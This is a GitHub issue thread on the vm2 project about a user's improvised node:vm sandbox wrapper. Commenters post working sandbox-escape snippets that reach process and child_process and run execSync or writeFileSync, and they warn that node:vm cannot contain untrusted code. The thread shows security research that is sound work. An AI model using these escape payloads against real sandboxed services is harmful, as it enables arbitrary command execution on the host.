### ISSUE TITLE
If my solution helps....

### ISSUE THREAD

**Issue by mgttt** [patriksimek/vm2#535]
It might be strange, but the codes below works for me well. (At lease the known cracking case not working with it)

Please point out any hack case if you found, thanks very much.

```
var jevalx = (js,ctx,timeout=60000,vm=require('node:vm'))=>vm.createScript(
  `[(function(){return eval(arguments[0])})][0](${JSON.stringify(js)})`
).runInContext(vm.createContext(ctx),{breakOnSigint:true,timeout});
```

If it works for you too, please star me at https://github.com/wanjo-tech/kk

**Comment by mgttt** [comment]
thanks for your example. I patch a little to continue. (because I just need to use it as a tiny vm for most cases...)

```
var jevalx = (js,ctx,timeout=60000,vm=require('node:vm'))=>vm.createScript((js="Error=function(...a){return [...a]};"+js,
  `[(function(){return eval(arguments[0])})][0](${JSON.stringify(js)})`//my magic for 'this'
)).runInContext(vm.createContext(ctx),{breakOnSigint:true,timeout});
```

Do you think of any more hacking way?

**Comment by mgttt** [comment]
Great! I then make a dirty patch so that my vm can continue to use.  thanks very much!

```
var jevalx = (js,ctx,timeout=60000,vm=require('node:vm'))=>vm.createScript((js="delete globalThis;delete process;const Error=function(...a){return [...a]};"+js,
  `[(function(){return eval(arguments[0])})][0](${JSON.stringify(js)})`//my magic for 'this'
)).runInContext(vm.createContext(ctx),{breakOnSigint:true,timeout});
```

**Comment by j4k0xb** [comment]
Please don't rely on a few patches or `vm` in general for dealing with untrusted code, it gives a false sense of security and there are countless ways to bypass it
That's why the readme says
> Consider migrating your code to [isolated-vm](https://www.npmjs.com/package/isolated-vm).

```js
const obj = {
  [Symbol.for("nodejs.util.inspect.custom")]: (depth, opt, inspect) => {
    inspect
      .constructor("return process")()
      .mainModule.require("child_process")
      .execSync("touch pwned");
  },
  valueOf: undefined,
  constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});
```

**Comment by mgttt** [comment]
I cleanly know about it. I just want the tiny vm working untiil final other solution came.  very thanks for the reminding anyway.

> Please don't rely on a few patches or node's `vm` in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)
> 
> That's why the readme says
> 
> > Consider migrating your code to [isolated-vm](https://www.npmjs.com/package/isolated-vm).

**Comment by mgttt** [comment]
you are a talent hacker, but we can be more patient to find-and-fix in game.

anyway, please continue.  @j4k0xb 

```test_jevalx.js
var jevalx = async(js,ctx,timeout=60000,More=['process','Symbol','Error','eval','require'],vm=require('node:vm'),Wtf={})=>{
  for(let k of[...Object.keys(globalThis),...More]){Wtf[k]=globalThis[k];delete globalThis[k]}
  try{return await vm.createScript(js).runInContext(vm.createContext(ctx),{breakOnSigint:true,timeout})}
  catch(ex){throw ex}finally{for(var k in Wtf){globalThis[k]=Wtf[k]};}
};

//process not found for the case
jevalx("this.constructor.constructor(`(async()=>{})().then(()=>{process.mainModule.require('fs').writeFileSync('pwned','')})`)();");
```

**Comment by mgttt** [comment]
@XmiliaH BTW, shouldn't make this issue 'Closed' so early.  Now no more ppl can help to find-and-fix.... //sigh

**Comment by XmiliaH** [comment]
Your *soulution* does not help as @j4k0xb showed again and again. Stop asking here what problems your solution sill has. It has nothing to do with `vm2`. Move this discussion over to your own repo.
